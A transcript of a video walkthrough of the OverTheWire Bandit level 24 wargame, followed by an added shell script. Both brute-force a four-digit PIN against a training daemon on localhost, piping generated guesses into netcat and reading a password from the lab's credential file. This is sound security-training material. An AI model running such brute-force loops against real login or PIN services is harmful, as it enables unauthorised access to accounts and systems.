What's going on guys? Welcome back to the YouTube video. My name is John Hammond and we are still in Bandit, the OverTheWire wargame. Let's jump back in. We just finished up with level 23, now we're jumping into level 24. I've got that file saved so we can use our sshpass real easy and just make the connection that we need. Cool. What is the prompt here? It says a daemon is listening on port 30002 and will give the password for bandit25 if given the password for bandit24 and a secret numeric four-digit pincode. There's no way to retrieve the pincode except by going through all of the 10,000 combinations, called brute forcing. Hmm, okay. Well, if it's just a number that we don't know, we can probably loop through numbers and guess, right? And we have the password for bandit24; we can just check that, and it's at /etc/bandit_pass/bandit24. Right there it is. So let's try and connect to this daemon listening on port 30002. We can do that with netcat, right? We know we can create a socket and a connection to 30002. "I am the pincode checker for user 25. Please enter the password for the user bandit24 and the secret pincode on a single line separated by a space." Hmm, so a random guess: three eight two six and... oh, I'm sorry, it's probably gonna be the other way around, the password first and then three eight two six, a random guess. "Wrong! Please enter the correct pincode and try again." Okay, hmm. Well, okay, let's break out of that. I use Ctrl-C to break out, and let's think about how we can do this. We had seen previously, in the cron.d cron job, it was like bandit24, right?
This guy has this script that we had seen before, which had been using a for loop in a shell script, and we might be able to use a for loop to just iterate through those numbers. Let's keep the password in our clipboard, and let's check out on Google how to do a bash for loop over numbers. Totally just taking the first Google result. And I know the syntax here, but I want to do this so you know: okay, just Google the things that you need to know. So this is the syntax: `for` with the `do` and `done`, and then doing what you're trying to do in that code block, put together with `do` and `done`. But to loop through numbers, you can use these curly braces here, and then the range that you want, with a single period and another period, just like that. Let's create a script. Can we get to... let's make a home for ourselves, a temp directory, john, whatever. Let's get there and let's create a new script. Let's call this like hammer.sh. "Can't create a save directory," that's okay. We know we're using a bash script, so let's put `#!/bin/bash`, the shebang line that we've got, and that's just necessary for the system to know what kind of program we are using, what kind of shell or scripting language that we want to use. So we're going from one to ten thousand, so let's do `done`, and let's just check out what that variable is right now: echo. I'm gonna save this, mark the script executable, chmod +x, and now we can run hammer.sh. When I hit enter here, you see it zooms through all of these, and if we just pipe this into head so we get the first couple lines, we're only getting one, two, three, four, five, six, seven, eight, nine, ten. But that's not a four-digit pincode right now; that's just the number of digits of the number that we're on, but we want the four digits. So what do we do? No additional input on this website, whatever. I'm gonna let you in on a little secret.
I can just go ahead and tell you: if you put the prefix zeros, or the zeros right in the front, before the number that you're working with (I guess we can really start from zero, in case 0000 just happens to be the pincode), it will keep all of those preceding zeros, or it'll keep the four digits that you were working with to begin with. So now we'll go from 0000 to 9999 and it'll keep that four-digit pincode. So let's try this now. If I bring this to head, you can see it kept all those zeros right at the start. And let's actually use three zeros, since it looks like it is filling out and keeping that. Let's keep the 000 by only using three, so that way we get a four-digit pincode and not a five-digit pincode like it looked like it was giving us. Let's try this out: ./hammer.sh. Great. Did I save it? Did that work? I did. Are we going too high? Did I have too many zeros on there? No, because that makes no sense. Okay, maybe... it's probably keeping that last digit because we're getting all the way to 10000. If we kept this to 9999, see, how does that look? Did it keep the three? Yeah, okay, good. So now it goes to the four, and let's check out the first hundred. Good. Okay, so now it's keeping the four digits that we want here. So while that is being echoed out, we also want to have our bandit24 password in there, right? I'm gonna put this in quotes just so it looks like all one string argument for the echo command. So now every iteration it'll print out the number, keeping the four digits for the pincode, with the password included. So if we run this script, our loop works just fine. Now let's pipe that into the netcat connection. We will netcat localhost 30002, and to run this script... it does this over and over and over again. This is going to be a little slow and not very convenient for us.
So let's print out what number iteration we're on, what our value of i is, on another line, and let's grep -v for "Wrong". This will take a while. At this point you are running the exploit, or you're running the attack, or you're doing what you need to do to actually successfully get the password here. I will let this run and eventually it'll get the password for us, and then hopefully I can show that in the video so you can see it and we'll move on. But definitely just let this run, trust the time. If you want to do something a little bit more special, you might be able to try counting down, because it's probably not going to be a four-digit pincode with the first two or three digits being a zero. You can go from 9999 down to 0000, so you might hit the key a little bit faster. In fact, I'll do that and then I'll pause the video until it happens. I totally lost my train of thought for a second. We're just switching the numbers, so now we're working down, and I guess I can grep for like "Correct" or something, and hopefully that will work. Okay, I'll run the script and let you know once it gets an answer. Okay, it caught it and I broke out. So it looks like the pin was five four four zero. I got "Correct", so it didn't tell us the password, and that's my fault, because I had grepped for "Correct" and that did not help us whatsoever, because we didn't get to see the line that actually had the password. So I guess we can look for bandit25, but now that we know what number it is, we can just run that single command. Let's break out of the script and paste that in here. Let's run it at five four four zero, the pincode, and "Correct", okay. The username is bandit25 and the password is this guy right here. Sweet, let's save the string. But that was awful, right? I gotta say, that took a long, long time, and even then I ruined it because I grepped for "Correct".
So it was totally wrong. I really hope you didn't end up wasting your time like I did. So let's try and make this better. Let's see what we can do if I check out that hammer script. Since the service, or what we're connecting to, actually just displays and exits after it sees the correct key, can we just echo all of these out to begin with? Can I just run hammer... oh no, hammer.sh. I don't actually want to send it to the service; I want to actually just prepare all of this input, like so, where we loop through everything and it's all multiple lines of everything that we want. And if I redirect this to like bruteforce (totally spelled brute force right), bruteforce.txt, if we cat bruteforce.txt now we have all that output on standard output, on our screen, on that stream. Can we just pipe that into netcat localhost, and will it read it all properly? That I don't know, so let's find out. Try this. It goes through all of it, and it does. Okay, dang, sweet. That kept all of our input on the same stream and it just happened almost instantly; we didn't have to wait for anything. So that's a better solution, and man, I wish I had given you that first, but hey, sometimes we don't know, sometimes we've got to try. And even like how I grepped for "Correct", that was a stupid move, because we never know, and I hope this is like a learning point for you. We never know what that service is going to do or how it's going to behave, especially when it does what we want it to do. We could have assumed it would just give us something like "password", but we never know if it would just spit out the password itself. Maybe it wouldn't give us the word. So having this input all prepared, all those lines, and then spitting that out and keeping it in that buffer or that stream, piped in, was a good move. Okay, cool. Thank you guys for watching.
Hope you enjoyed this. Let's save this password as bandit25 and let's keep moving on. I'll see you in the next video.
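The approach the video ends on, as an added example that is not John Hammond's hammer.sh and not part of the transcript: generate every "password pin" line up front with zero-padded PINs (optionally counting down, as suggested in the video), pipe the whole list into a single netcat session, and then keep every reply line that is not a "Wrong" rejection instead of grepping only for "Correct", so the line carrying the password is not thrown away. The daemon address (localhost:30002) and the password path (/etc/bandit_pass/bandit24) come from the transcript; the daemon's exact reply wording is not known here, so the sample replies below are constructed for offline testing and are not real daemon output.

```shell
#!/bin/sh
# Added example, not the script from the video. Assumes the bandit24 password
# is readable from /etc/bandit_pass/bandit24 (as on the Bandit box); the
# placeholder is used when that file is absent.
PASS24=$(cat /etc/bandit_pass/bandit24 2>/dev/null || printf '%s' 'PLACEHOLDER_BANDIT24_PASSWORD')

# Print one "<password> <pin>" line per PIN. printf's %04d is what keeps the
# leading zeros (0000, 0001, ...); a bare {1..10000} loop drops them.
# gen_candidates <pass> [start] [end]: "gen_candidates pw 9999 0" counts down.
gen_candidates() {
    pass=$1; start=${2:-0}; end=${3:-9999}
    if [ "$start" -le "$end" ]; then step=1; else step=-1; fi
    i=$start
    while :; do
        printf '%s %04d\n' "$pass" "$i"
        [ "$i" -eq "$end" ] && break
        i=$((i + step))
    done
}

# Read the daemon's replies on stdin and drop the rejections and the prompt
# banner. Everything else survives, so whatever the daemon prints after a
# correct guess (including the password line) is kept, not just "Correct".
# Case-insensitive because the exact capitalisation is an assumption.
filter_hits() {
    grep -iv -e 'wrong' -e 'please enter'
}

# Constructed sample replies for offline testing. Not real daemon output;
# the wording and the password value are made up.
sample_replies() {
    printf '%s\n' \
        'I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.' \
        'Wrong! Please enter the correct pincode and try again.' \
        'Wrong! Please enter the correct pincode and try again.' \
        'Correct!' \
        'The password of user bandit25 is EXAMPLE_PASSWORD_NOT_REAL'
}

# With --run, attack the real daemon in one connection (network required);
# otherwise exercise the filter on the constructed sample.
if [ "${1:-}" = "--run" ]; then
    gen_candidates "$PASS24" 9999 0 | nc localhost 30002 | filter_hits
else
    sample_replies | filter_hits
fi
```

Run it as `./pinbrute.sh --run` on the Bandit box; without arguments it only runs the filter over the constructed sample, which should print the "Correct!" line and the password line and nothing else. If the daemon closes the connection after the first correct guess, the remaining candidates in the pipe are simply discarded, which is why sending the whole list in one session is fast.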